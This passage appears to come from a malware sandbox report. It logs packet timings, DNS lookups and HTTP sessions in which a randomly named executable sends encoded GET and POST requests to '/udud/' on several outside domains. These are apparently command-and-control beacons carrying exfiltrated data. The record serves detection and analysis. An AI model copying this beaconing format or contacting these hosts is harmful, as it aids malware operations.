                                                                                                May 27, 2024 12:35:23.132927895 CEST80498883.73.27.108192.168.11.30
                                                                                                May 27, 2024 12:35:23.132944107 CEST4988880192.168.11.303.73.27.108
                                                                                                May 27, 2024 12:35:23.133050919 CEST80498883.73.27.108192.168.11.30
                                                                                                May 27, 2024 12:35:23.133255959 CEST4988880192.168.11.303.73.27.108
                                                                                                May 27, 2024 12:35:23.319077969 CEST80498883.73.27.108192.168.11.30
                                                                                                May 27, 2024 12:35:23.319134951 CEST80498883.73.27.108192.168.11.30
                                                                                                May 27, 2024 12:35:23.319385052 CEST4988880192.168.11.303.73.27.108
                                                                                                May 27, 2024 12:35:24.358414888 CEST4988880192.168.11.303.73.27.108
                                                                                                May 27, 2024 12:35:25.380892038 CEST4988980192.168.11.303.73.27.108
                                                                                                May 27, 2024 12:35:25.566447973 CEST80498893.73.27.108192.168.11.30
                                                                                                May 27, 2024 12:35:25.566787004 CEST4988980192.168.11.303.73.27.108
                                                                                                May 27, 2024 12:35:25.568823099 CEST4988980192.168.11.303.73.27.108
                                                                                                May 27, 2024 12:35:25.753539085 CEST80498893.73.27.108192.168.11.30
                                                                                                May 27, 2024 12:35:25.843925953 CEST80498893.73.27.108192.168.11.30
                                                                                                May 27, 2024 12:35:25.844014883 CEST80498893.73.27.108192.168.11.30
                                                                                                May 27, 2024 12:35:25.844063997 CEST80498893.73.27.108192.168.11.30
                                                                                                May 27, 2024 12:35:25.844130039 CEST80498893.73.27.108192.168.11.30
                                                                                                May 27, 2024 12:35:25.844209909 CEST4988980192.168.11.303.73.27.108
                                                                                                May 27, 2024 12:35:25.844263077 CEST80498893.73.27.108192.168.11.30
                                                                                                May 27, 2024 12:35:25.844310999 CEST4988980192.168.11.303.73.27.108
                                                                                                May 27, 2024 12:35:25.844327927 CEST80498893.73.27.108192.168.11.30
                                                                                                May 27, 2024 12:35:25.844419003 CEST80498893.73.27.108192.168.11.30
                                                                                                May 27, 2024 12:35:25.844510078 CEST80498893.73.27.108192.168.11.30
                                                                                                May 27, 2024 12:35:25.844563007 CEST4988980192.168.11.303.73.27.108
                                                                                                May 27, 2024 12:35:25.844573975 CEST80498893.73.27.108192.168.11.30
                                                                                                May 27, 2024 12:35:25.844588041 CEST80498893.73.27.108192.168.11.30
                                                                                                May 27, 2024 12:35:25.844732046 CEST4988980192.168.11.303.73.27.108
                                                                                                May 27, 2024 12:35:26.029164076 CEST80498893.73.27.108192.168.11.30
                                                                                                May 27, 2024 12:35:26.029197931 CEST80498893.73.27.108192.168.11.30
                                                                                                May 27, 2024 12:35:26.029292107 CEST4988980192.168.11.303.73.27.108
                                                                                                May 27, 2024 12:35:27.076575994 CEST4988980192.168.11.303.73.27.108
                                                                                                May 27, 2024 12:35:28.095357895 CEST4989080192.168.11.303.73.27.108
                                                                                                May 27, 2024 12:35:28.283647060 CEST80498903.73.27.108192.168.11.30
                                                                                                May 27, 2024 12:35:28.283857107 CEST4989080192.168.11.303.73.27.108
                                                                                                May 27, 2024 12:35:28.285986900 CEST4989080192.168.11.303.73.27.108
                                                                                                May 27, 2024 12:35:28.473088026 CEST80498903.73.27.108192.168.11.30
                                                                                                May 27, 2024 12:35:28.473189116 CEST80498903.73.27.108192.168.11.30
                                                                                                May 27, 2024 12:35:28.566508055 CEST80498903.73.27.108192.168.11.30
                                                                                                May 27, 2024 12:35:28.566606998 CEST80498903.73.27.108192.168.11.30
                                                                                                May 27, 2024 12:35:28.566622019 CEST80498903.73.27.108192.168.11.30
                                                                                                May 27, 2024 12:35:28.566745996 CEST80498903.73.27.108192.168.11.30
                                                                                                May 27, 2024 12:35:28.566761017 CEST80498903.73.27.108192.168.11.30
                                                                                                May 27, 2024 12:35:28.566816092 CEST4989080192.168.11.303.73.27.108
                                                                                                May 27, 2024 12:35:28.566855907 CEST80498903.73.27.108192.168.11.30
                                                                                                May 27, 2024 12:35:28.566874027 CEST4989080192.168.11.303.73.27.108
                                                                                                May 27, 2024 12:35:28.567013025 CEST80498903.73.27.108192.168.11.30
                                                                                                May 27, 2024 12:35:28.567025900 CEST80498903.73.27.108192.168.11.30
                                                                                                May 27, 2024 12:35:28.567042112 CEST4989080192.168.11.303.73.27.108
                                                                                                May 27, 2024 12:35:28.567051888 CEST80498903.73.27.108192.168.11.30
                                                                                                May 27, 2024 12:35:28.567064047 CEST80498903.73.27.108192.168.11.30
                                                                                                May 27, 2024 12:35:28.567200899 CEST4989080192.168.11.303.73.27.108
                                                                                                May 27, 2024 12:35:28.567328930 CEST4989080192.168.11.303.73.27.108
                                                                                                May 27, 2024 12:35:28.753956079 CEST80498903.73.27.108192.168.11.30
                                                                                                May 27, 2024 12:35:28.754003048 CEST80498903.73.27.108192.168.11.30
                                                                                                May 27, 2024 12:35:28.754756927 CEST4989080192.168.11.303.73.27.108
                                                                                                May 27, 2024 12:35:29.794678926 CEST4989080192.168.11.303.73.27.108
                                                                                                May 27, 2024 12:35:30.813299894 CEST4989180192.168.11.303.73.27.108
                                                                                                May 27, 2024 12:35:31.001065969 CEST80498913.73.27.108192.168.11.30
                                                                                                May 27, 2024 12:35:31.001257896 CEST4989180192.168.11.303.73.27.108
                                                                                                May 27, 2024 12:35:31.002948999 CEST4989180192.168.11.303.73.27.108
                                                                                                May 27, 2024 12:35:31.189563036 CEST80498913.73.27.108192.168.11.30
                                                                                                May 27, 2024 12:35:31.247622967 CEST80498913.73.27.108192.168.11.30
                                                                                                May 27, 2024 12:35:31.247708082 CEST80498913.73.27.108192.168.11.30
                                                                                                May 27, 2024 12:35:31.247790098 CEST80498913.73.27.108192.168.11.30
                                                                                                May 27, 2024 12:35:31.247843027 CEST80498913.73.27.108192.168.11.30
                                                                                                May 27, 2024 12:35:31.247951984 CEST80498913.73.27.108192.168.11.30
                                                                                                May 27, 2024 12:35:31.248073101 CEST80498913.73.27.108192.168.11.30
                                                                                                May 27, 2024 12:35:31.248136044 CEST4989180192.168.11.303.73.27.108
                                                                                                May 27, 2024 12:35:31.248136044 CEST4989180192.168.11.303.73.27.108
                                                                                                May 27, 2024 12:35:31.248161077 CEST80498913.73.27.108192.168.11.30
                                                                                                May 27, 2024 12:35:31.248219967 CEST80498913.73.27.108192.168.11.30
                                                                                                May 27, 2024 12:35:31.248233080 CEST80498913.73.27.108192.168.11.30
                                                                                                May 27, 2024 12:35:31.248301029 CEST4989180192.168.11.303.73.27.108
                                                                                                May 27, 2024 12:35:31.248322010 CEST80498913.73.27.108192.168.11.30
                                                                                                May 27, 2024 12:35:31.248461008 CEST4989180192.168.11.303.73.27.108
                                                                                                May 27, 2024 12:35:31.248653889 CEST4989180192.168.11.303.73.27.108
                                                                                                May 27, 2024 12:35:31.434861898 CEST80498913.73.27.108192.168.11.30
                                                                                                May 27, 2024 12:35:31.434884071 CEST80498913.73.27.108192.168.11.30
                                                                                                May 27, 2024 12:35:31.434941053 CEST80498913.73.27.108192.168.11.30
                                                                                                May 27, 2024 12:35:31.435153961 CEST4989180192.168.11.303.73.27.108
                                                                                                May 27, 2024 12:35:31.435193062 CEST80498913.73.27.108192.168.11.30
                                                                                                May 27, 2024 12:35:31.435272932 CEST80498913.73.27.108192.168.11.30
                                                                                                May 27, 2024 12:35:31.435285091 CEST80498913.73.27.108192.168.11.30
                                                                                                May 27, 2024 12:35:31.435297012 CEST80498913.73.27.108192.168.11.30
                                                                                                May 27, 2024 12:35:31.435308933 CEST80498913.73.27.108192.168.11.30
                                                                                                May 27, 2024 12:35:31.435319901 CEST80498913.73.27.108192.168.11.30
                                                                                                May 27, 2024 12:35:31.435421944 CEST4989180192.168.11.303.73.27.108
                                                                                                May 27, 2024 12:35:31.435486078 CEST80498913.73.27.108192.168.11.30
                                                                                                May 27, 2024 12:35:31.435496092 CEST4989180192.168.11.303.73.27.108
                                                                                                May 27, 2024 12:35:31.435497999 CEST80498913.73.27.108192.168.11.30
                                                                                                May 27, 2024 12:36:31.828864098 CEST4990680192.168.11.303.64.163.50
                                                                                                May 27, 2024 12:36:31.832983017 CEST4990680192.168.11.303.64.163.50
                                                                                                May 27, 2024 12:36:32.018553019 CEST80499063.64.163.50192.168.11.30
                                                                                                May 27, 2024 12:36:32.018639088 CEST80499063.64.163.50192.168.11.30
                                                                                                May 27, 2024 12:36:32.020076036 CEST80499063.64.163.50192.168.11.30
                                                                                                May 27, 2024 12:36:32.020185947 CEST80499063.64.163.50192.168.11.30
                                                                                                May 27, 2024 12:36:32.020490885 CEST4990680192.168.11.303.64.163.50
                                                                                                May 27, 2024 12:36:33.342747927 CEST4990680192.168.11.303.64.163.50
                                                                                                May 27, 2024 12:36:34.360780954 CEST4990780192.168.11.303.64.163.50
                                                                                                May 27, 2024 12:36:34.546036005 CEST80499073.64.163.50192.168.11.30
                                                                                                May 27, 2024 12:36:34.546303988 CEST4990780192.168.11.303.64.163.50
                                                                                                May 27, 2024 12:36:34.548211098 CEST4990780192.168.11.303.64.163.50
                                                                                                May 27, 2024 12:36:34.733131886 CEST80499073.64.163.50192.168.11.30
                                                                                                May 27, 2024 12:36:34.733323097 CEST80499073.64.163.50192.168.11.30
                                                                                                May 27, 2024 12:36:34.733350039 CEST80499073.64.163.50192.168.11.30
                                                                                                May 27, 2024 12:36:34.733583927 CEST4990780192.168.11.303.64.163.50
                                                                                                May 27, 2024 12:36:34.736074924 CEST4990780192.168.11.303.64.163.50
                                                                                                May 27, 2024 12:36:34.920782089 CEST80499073.64.163.50192.168.11.30
                                                                                                May 27, 2024 12:36:48.578161001 CEST4990880192.168.11.30116.203.164.244
                                                                                                May 27, 2024 12:36:48.769243002 CEST8049908116.203.164.244192.168.11.30
                                                                                                May 27, 2024 12:36:48.769454956 CEST4990880192.168.11.30116.203.164.244
                                                                                                May 27, 2024 12:36:48.771430016 CEST4990880192.168.11.30116.203.164.244
                                                                                                May 27, 2024 12:36:48.961910963 CEST8049908116.203.164.244192.168.11.30
                                                                                                May 27, 2024 12:36:48.968434095 CEST8049908116.203.164.244192.168.11.30
                                                                                                May 27, 2024 12:36:48.968535900 CEST8049908116.203.164.244192.168.11.30
                                                                                                May 27, 2024 12:36:48.968738079 CEST4990880192.168.11.30116.203.164.244
                                                                                                May 27, 2024 12:36:50.276382923 CEST4990880192.168.11.30116.203.164.244
                                                                                                May 27, 2024 12:36:51.294683933 CEST4990980192.168.11.30116.203.164.244
                                                                                                May 27, 2024 12:36:51.485438108 CEST8049909116.203.164.244192.168.11.30
                                                                                                May 27, 2024 12:36:51.485707998 CEST4990980192.168.11.30116.203.164.244
                                                                                                May 27, 2024 12:36:51.487436056 CEST4990980192.168.11.30116.203.164.244
                                                                                                May 27, 2024 12:36:51.678210974 CEST8049909116.203.164.244192.168.11.30
                                                                                                May 27, 2024 12:36:51.684880972 CEST8049909116.203.164.244192.168.11.30
                                                                                                May 27, 2024 12:36:51.684968948 CEST8049909116.203.164.244192.168.11.30
                                                                                                May 27, 2024 12:36:51.685097933 CEST4990980192.168.11.30116.203.164.244
                                                                                                May 27, 2024 12:36:52.994532108 CEST4990980192.168.11.30116.203.164.244
                                                                                                May 27, 2024 12:36:54.012887955 CEST4991080192.168.11.30116.203.164.244
                                                                                                May 27, 2024 12:36:54.203438997 CEST8049910116.203.164.244192.168.11.30
                                                                                                May 27, 2024 12:36:54.203650951 CEST4991080192.168.11.30116.203.164.244
                                                                                                May 27, 2024 12:36:54.206783056 CEST4991080192.168.11.30116.203.164.244
                                                                                                May 27, 2024 12:36:54.397398949 CEST8049910116.203.164.244192.168.11.30
                                                                                                May 27, 2024 12:36:54.405515909 CEST8049910116.203.164.244192.168.11.30
                                                                                                May 27, 2024 12:36:54.405529022 CEST8049910116.203.164.244192.168.11.30
                                                                                                May 27, 2024 12:36:54.405711889 CEST4991080192.168.11.30116.203.164.244
                                                                                                May 27, 2024 12:36:55.712644100 CEST4991080192.168.11.30116.203.164.244
                                                                                                May 27, 2024 12:36:56.730653048 CEST4991180192.168.11.30116.203.164.244
                                                                                                May 27, 2024 12:36:56.921195030 CEST8049911116.203.164.244192.168.11.30
                                                                                                May 27, 2024 12:36:56.921329975 CEST4991180192.168.11.30116.203.164.244
                                                                                                May 27, 2024 12:36:56.923016071 CEST4991180192.168.11.30116.203.164.244
                                                                                                May 27, 2024 12:36:57.113603115 CEST8049911116.203.164.244192.168.11.30
                                                                                                May 27, 2024 12:36:57.118632078 CEST8049911116.203.164.244192.168.11.30
                                                                                                May 27, 2024 12:36:57.118644953 CEST8049911116.203.164.244192.168.11.30
                                                                                                May 27, 2024 12:36:57.118895054 CEST4991180192.168.11.30116.203.164.244
                                                                                                May 27, 2024 12:36:57.123277903 CEST4991180192.168.11.30116.203.164.244
                                                                                                May 27, 2024 12:36:57.313642979 CEST8049911116.203.164.244192.168.11.30
                                                                                                May 27, 2024 12:37:02.783622026 CEST4991280192.168.11.30185.215.4.19
                                                                                                May 27, 2024 12:37:02.910418987 CEST8049912185.215.4.19192.168.11.30
                                                                                                May 27, 2024 12:37:02.910618067 CEST4991280192.168.11.30185.215.4.19
                                                                                                May 27, 2024 12:37:02.912525892 CEST4991280192.168.11.30185.215.4.19
                                                                                                May 27, 2024 12:37:03.038208961 CEST8049912185.215.4.19192.168.11.30
                                                                                                May 27, 2024 12:37:03.197293997 CEST8049912185.215.4.19192.168.11.30
                                                                                                May 27, 2024 12:37:03.197307110 CEST8049912185.215.4.19192.168.11.30
                                                                                                May 27, 2024 12:37:03.197511911 CEST4991280192.168.11.30185.215.4.19
                                                                                                May 27, 2024 12:37:04.413815975 CEST4991280192.168.11.30185.215.4.19
                                                                                                May 27, 2024 12:37:05.431983948 CEST4991380192.168.11.30185.215.4.19
                                                                                                May 27, 2024 12:37:05.558526993 CEST8049913185.215.4.19192.168.11.30
                                                                                                May 27, 2024 12:37:05.558731079 CEST4991380192.168.11.30185.215.4.19
                                                                                                May 27, 2024 12:37:05.560663939 CEST4991380192.168.11.30185.215.4.19
                                                                                                May 27, 2024 12:37:05.687385082 CEST8049913185.215.4.19192.168.11.30
                                                                                                May 27, 2024 12:37:05.831618071 CEST8049913185.215.4.19192.168.11.30
                                                                                                May 27, 2024 12:37:05.831630945 CEST8049913185.215.4.19192.168.11.30
                                                                                                May 27, 2024 12:37:05.831800938 CEST4991380192.168.11.30185.215.4.19
                                                                                                May 27, 2024 12:37:07.069458961 CEST4991380192.168.11.30185.215.4.19
                                                                                                May 27, 2024 12:37:08.087783098 CEST4991480192.168.11.30185.215.4.19
                                                                                                May 27, 2024 12:37:08.214327097 CEST8049914185.215.4.19192.168.11.30
                                                                                                May 27, 2024 12:37:08.214494944 CEST4991480192.168.11.30185.215.4.19
                                                                                                May 27, 2024 12:37:08.216242075 CEST4991480192.168.11.30185.215.4.19
                                                                                                May 27, 2024 12:37:08.343696117 CEST8049914185.215.4.19192.168.11.30
                                                                                                May 27, 2024 12:37:08.470360041 CEST8049914185.215.4.19192.168.11.30
                                                                                                May 27, 2024 12:37:08.470372915 CEST8049914185.215.4.19192.168.11.30
                                                                                                May 27, 2024 12:37:08.470558882 CEST4991480192.168.11.30185.215.4.19
                                                                                                May 27, 2024 12:37:09.725056887 CEST4991480192.168.11.30185.215.4.19
                                                                                                May 27, 2024 12:37:10.743016005 CEST4991580192.168.11.30185.215.4.19
                                                                                                May 27, 2024 12:37:10.869113922 CEST8049915185.215.4.19192.168.11.30
                                                                                                May 27, 2024 12:37:10.869297981 CEST4991580192.168.11.30185.215.4.19
                                                                                                May 27, 2024 12:37:10.871109009 CEST4991580192.168.11.30185.215.4.19
                                                                                                May 27, 2024 12:37:10.997163057 CEST8049915185.215.4.19192.168.11.30
                                                                                                May 27, 2024 12:37:11.128859997 CEST8049915185.215.4.19192.168.11.30
                                                                                                May 27, 2024 12:37:11.128871918 CEST8049915185.215.4.19192.168.11.30
                                                                                                May 27, 2024 12:37:11.129270077 CEST4991580192.168.11.30185.215.4.19
                                                                                                May 27, 2024 12:37:11.132046938 CEST4991580192.168.11.30185.215.4.19
                                                                                                May 27, 2024 12:37:11.257441044 CEST8049915185.215.4.19192.168.11.30
                                                                                                May 27, 2024 12:37:24.303421021 CEST4991680192.168.11.30162.209.189.152
                                                                                                May 27, 2024 12:37:24.462656021 CEST8049916162.209.189.152192.168.11.30
                                                                                                May 27, 2024 12:37:24.462937117 CEST4991680192.168.11.30162.209.189.152
                                                                                                May 27, 2024 12:37:24.622390032 CEST8049916162.209.189.152192.168.11.30
                                                                                                May 27, 2024 12:37:24.622487068 CEST8049916162.209.189.152192.168.11.30
                                                                                                May 27, 2024 12:37:24.622719049 CEST4991680192.168.11.30162.209.189.152
                                                                                                May 27, 2024 12:37:24.781934977 CEST8049916162.209.189.152192.168.11.30
                                                                                                May 27, 2024 12:37:26.991353035 CEST4991780192.168.11.30162.209.189.152
                                                                                                May 27, 2024 12:37:27.152936935 CEST8049917162.209.189.152192.168.11.30
                                                                                                May 27, 2024 12:37:27.153242111 CEST4991780192.168.11.30162.209.189.152
                                                                                                May 27, 2024 12:37:27.314883947 CEST8049917162.209.189.152192.168.11.30
                                                                                                May 27, 2024 12:37:27.314970016 CEST8049917162.209.189.152192.168.11.30
                                                                                                May 27, 2024 12:37:27.315144062 CEST4991780192.168.11.30162.209.189.152
                                                                                                May 27, 2024 12:37:27.476727962 CEST8049917162.209.189.152192.168.11.30
                                                                                                May 27, 2024 12:37:29.676614046 CEST4991880192.168.11.30162.209.189.152
                                                                                                May 27, 2024 12:37:29.835529089 CEST8049918162.209.189.152192.168.11.30
                                                                                                May 27, 2024 12:37:29.835736036 CEST4991880192.168.11.30162.209.189.152
                                                                                                May 27, 2024 12:37:29.994443893 CEST8049918162.209.189.152192.168.11.30
                                                                                                May 27, 2024 12:37:29.994457960 CEST8049918162.209.189.152192.168.11.30
                                                                                                May 27, 2024 12:37:29.994710922 CEST4991880192.168.11.30162.209.189.152
                                                                                                May 27, 2024 12:37:30.153559923 CEST8049918162.209.189.152192.168.11.30
                                                                                                May 27, 2024 12:37:32.363539934 CEST4991980192.168.11.30162.209.189.152
                                                                                                May 27, 2024 12:37:32.523092985 CEST8049919162.209.189.152192.168.11.30
                                                                                                May 27, 2024 12:37:32.523288965 CEST4991980192.168.11.30162.209.189.152
                                                                                                May 27, 2024 12:37:32.682533979 CEST8049919162.209.189.152192.168.11.30
                                                                                                May 27, 2024 12:37:32.682625055 CEST8049919162.209.189.152192.168.11.30
                                                                                                May 27, 2024 12:37:32.682966948 CEST4991980192.168.11.30162.209.189.152
                                                                                                May 27, 2024 12:37:32.842053890 CEST8049919162.209.189.152192.168.11.30
                                                                                                May 27, 2024 12:37:56.468053102 CEST4992480192.168.11.30208.112.85.150
                                                                                                May 27, 2024 12:37:56.571296930 CEST8049924208.112.85.150192.168.11.30
                                                                                                May 27, 2024 12:37:56.571521044 CEST4992480192.168.11.30208.112.85.150
                                                                                                May 27, 2024 12:37:56.573240995 CEST4992480192.168.11.30208.112.85.150
                                                                                                May 27, 2024 12:37:56.676348925 CEST8049924208.112.85.150192.168.11.30
                                                                                                May 27, 2024 12:37:56.689846992 CEST8049924208.112.85.150192.168.11.30
                                                                                                May 27, 2024 12:37:56.689898968 CEST8049924208.112.85.150192.168.11.30
                                                                                                May 27, 2024 12:37:56.690146923 CEST4992480192.168.11.30208.112.85.150
                                                                                                May 27, 2024 12:37:56.695069075 CEST4992480192.168.11.30208.112.85.150
                                                                                                May 27, 2024 12:37:56.798432112 CEST8049924208.112.85.150192.168.11.30
                                                                                                May 27, 2024 12:38:01.701793909 CEST4992580192.168.11.3079.98.25.1
                                                                                                May 27, 2024 12:38:01.909320116 CEST804992579.98.25.1192.168.11.30
                                                                                                May 27, 2024 12:38:01.909532070 CEST4992580192.168.11.3079.98.25.1
                                                                                                May 27, 2024 12:38:01.911180019 CEST4992580192.168.11.3079.98.25.1
                                                                                                May 27, 2024 12:38:02.118588924 CEST804992579.98.25.1192.168.11.30
                                                                                                May 27, 2024 12:38:02.120111942 CEST804992579.98.25.1192.168.11.30
                                                                                                May 27, 2024 12:38:02.120234013 CEST804992579.98.25.1192.168.11.30
                                                                                                May 27, 2024 12:38:02.120347023 CEST804992579.98.25.1192.168.11.30
                                                                                                May 27, 2024 12:38:02.120428085 CEST4992580192.168.11.3079.98.25.1
                                                                                                May 27, 2024 12:38:02.120471954 CEST804992579.98.25.1192.168.11.30
                                                                                                May 27, 2024 12:38:02.120626926 CEST804992579.98.25.1192.168.11.30
                                                                                                May 27, 2024 12:38:02.120661974 CEST4992580192.168.11.3079.98.25.1
                                                                                                May 27, 2024 12:38:02.120737076 CEST804992579.98.25.1192.168.11.30
                                                                                                May 27, 2024 12:38:02.120923042 CEST4992580192.168.11.3079.98.25.1
                                                                                                May 27, 2024 12:38:02.123199940 CEST4992580192.168.11.3079.98.25.1
                                                                                                May 27, 2024 12:38:02.330634117 CEST804992579.98.25.1192.168.11.30
                                                                                                May 27, 2024 12:38:07.137116909 CEST4992680192.168.11.3064.190.62.22
                                                                                                May 27, 2024 12:38:07.326625109 CEST804992664.190.62.22192.168.11.30
                                                                                                May 27, 2024 12:38:07.326814890 CEST4992680192.168.11.3064.190.62.22
                                                                                                May 27, 2024 12:38:07.328663111 CEST4992680192.168.11.3064.190.62.22
                                                                                                May 27, 2024 12:38:07.555200100 CEST804992664.190.62.22192.168.11.30
                                                                                                May 27, 2024 12:38:07.555274010 CEST804992664.190.62.22192.168.11.30
                                                                                                May 27, 2024 12:38:07.555304050 CEST804992664.190.62.22192.168.11.30
                                                                                                May 27, 2024 12:38:07.555393934 CEST804992664.190.62.22192.168.11.30
                                                                                                May 27, 2024 12:38:07.555444002 CEST4992680192.168.11.3064.190.62.22
                                                                                                May 27, 2024 12:38:07.555531979 CEST804992664.190.62.22192.168.11.30
                                                                                                May 27, 2024 12:38:07.555625916 CEST4992680192.168.11.3064.190.62.22
                                                                                                May 27, 2024 12:38:07.555627108 CEST804992664.190.62.22192.168.11.30
                                                                                                May 27, 2024 12:38:07.555689096 CEST804992664.190.62.22192.168.11.30
                                                                                                May 27, 2024 12:38:07.555788994 CEST804992664.190.62.22192.168.11.30
                                                                                                May 27, 2024 12:38:07.555814028 CEST4992680192.168.11.3064.190.62.22
                                                                                                May 27, 2024 12:38:07.555815935 CEST804992664.190.62.22192.168.11.30
                                                                                                May 27, 2024 12:38:07.555875063 CEST804992664.190.62.22192.168.11.30
                                                                                                May 27, 2024 12:38:07.555948019 CEST4992680192.168.11.3064.190.62.22
                                                                                                May 27, 2024 12:38:07.555996895 CEST4992680192.168.11.3064.190.62.22
                                                                                                May 27, 2024 12:38:07.745125055 CEST804992664.190.62.22192.168.11.30
                                                                                                May 27, 2024 12:38:07.745218039 CEST804992664.190.62.22192.168.11.30
                                                                                                May 27, 2024 12:38:07.745347977 CEST804992664.190.62.22192.168.11.30
                                                                                                May 27, 2024 12:36:39.749198914 CEST5284653192.168.11.301.1.1.1
                                                                                                May 27, 2024 12:36:40.111711025 CEST53528461.1.1.1192.168.11.30
                                                                                                May 27, 2024 12:36:48.170764923 CEST6221353192.168.11.301.1.1.1
                                                                                                May 27, 2024 12:36:48.574687004 CEST53622131.1.1.1192.168.11.30
                                                                                                May 27, 2024 12:37:02.136421919 CEST5006453192.168.11.301.1.1.1
                                                                                                May 27, 2024 12:37:02.781204939 CEST53500641.1.1.1192.168.11.30
                                                                                                May 27, 2024 12:37:16.148547888 CEST4960153192.168.11.301.1.1.1
                                                                                                May 27, 2024 12:37:16.251353979 CEST53496011.1.1.1192.168.11.30
                                                                                                May 27, 2024 12:37:37.690480947 CEST6400053192.168.11.301.1.1.1
                                                                                                May 27, 2024 12:37:37.795667887 CEST53640001.1.1.1192.168.11.30
                                                                                                May 27, 2024 12:37:50.890393019 CEST6239053192.168.11.301.1.1.1
                                                                                                May 27, 2024 12:37:51.457040071 CEST53623901.1.1.1192.168.11.30
                                                                                                May 27, 2024 12:38:18.570272923 CEST5873653192.168.11.301.1.1.1
                                                                                                May 27, 2024 12:38:18.736293077 CEST53587361.1.1.1192.168.11.30
                                                                                                May 27, 2024 12:38:45.845140934 CEST5686153192.168.11.301.1.1.1
                                                                                                May 27, 2024 12:38:46.162926912 CEST53568611.1.1.1192.168.11.30
                                                                                                May 27, 2024 12:38:58.483895063 CEST5189453192.168.11.301.1.1.1
                                                                                                May 27, 2024 12:38:58.812975883 CEST53518941.1.1.1192.168.11.30
                                                                                                May 27, 2024 12:39:04.233263016 CEST4976553192.168.11.301.1.1.1
                                                                                                May 27, 2024 12:39:04.373385906 CEST53497651.1.1.1192.168.11.30
                                                                                                May 27, 2024 12:39:20.322813034 CEST6197253192.168.11.301.1.1.1
                                                                                                May 27, 2024 12:39:20.469120979 CEST53619721.1.1.1192.168.11.30
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.11.30 | 49829 | 208.112.85.150 | 80 | 7584 | C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
Timestamp | Bytes transferred | Direction | Data
May 27, 2024 12:31:16.583331108 CEST | 481 | OUT | GET /udud/?Pl9P8ldX=FIraThNO5niOHukbO1r8qSNysm+mJ2OOQaLhh3AktbepBJXcjCIQ5u+D5oIg7MUCVA/ZghdlXch7ulyeg4ZZkVaM25CfsdbY6Ciec8CSMOWGBD2e85VJ6eo=&UJ2H=ED2dW8S8UxwlG HTTP/1.1
                                                                                                Host: www.fivetownsjcc.com
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
May 27, 2024 12:31:16.689500093 CEST | 383 | IN | HTTP/1.1 404 Not Found
                                                                                                Date: Mon, 27 May 2024 10:30:56 GMT
                                                                                                Server: Apache
                                                                                                X-SERVER: 3908
                                                                                                Content-Length: 203
                                                                                                Connection: close
                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /udud/ was not found on this server.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.11.30 | 49831 | 79.98.25.1 | 80 | 7584 | C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
Timestamp | Bytes transferred | Direction | Data
May 27, 2024 12:31:32.596218109 CEST | 742 | OUT | POST /udud/ HTTP/1.1
                                                                                                Host: www.maxiwalls.com
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Origin: http://www.maxiwalls.com
                                                                                                Referer: http://www.maxiwalls.com/udud/
                                                                                                Content-Length: 205
                                                                                                Cache-Control: max-age=0
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                Data Ascii: Pl9P8ldX=z5HAL1LVNkBmUAB1b381A2pEa+o3huGT6bxPRgURMfqUfvKcliiMh6b0BLY5O64EssUdKnNPFfBwrEAdnmuUl3ljgQn5F7CH7Rd1pDdI/x2X96kWCxK22o2Fte2HfM1+Gmr8ayCXoIzuzl8a2sGMrQtI0qitsmXEDJeu1DZSctw0RDOvL+QC7oO3GJOOBxHy4A==
May 27, 2024 12:31:32.811263084 CEST | 363 | IN | HTTP/1.1 403 Forbidden
                                                                                                Date: Mon, 27 May 2024 10:31:32 GMT
                                                                                                Server: Apache
                                                                                                Content-Length: 199
                                                                                                Connection: close
                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.11.30 | 49832 | 79.98.25.1 | 80 | 7584 | C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
Timestamp | Bytes transferred | Direction | Data
May 27, 2024 12:31:35.330244064 CEST | 762 | OUT | POST /udud/ HTTP/1.1
                                                                                                Host: www.maxiwalls.com
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Origin: http://www.maxiwalls.com
                                                                                                Referer: http://www.maxiwalls.com/udud/
                                                                                                Content-Length: 225
                                                                                                Cache-Control: max-age=0
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
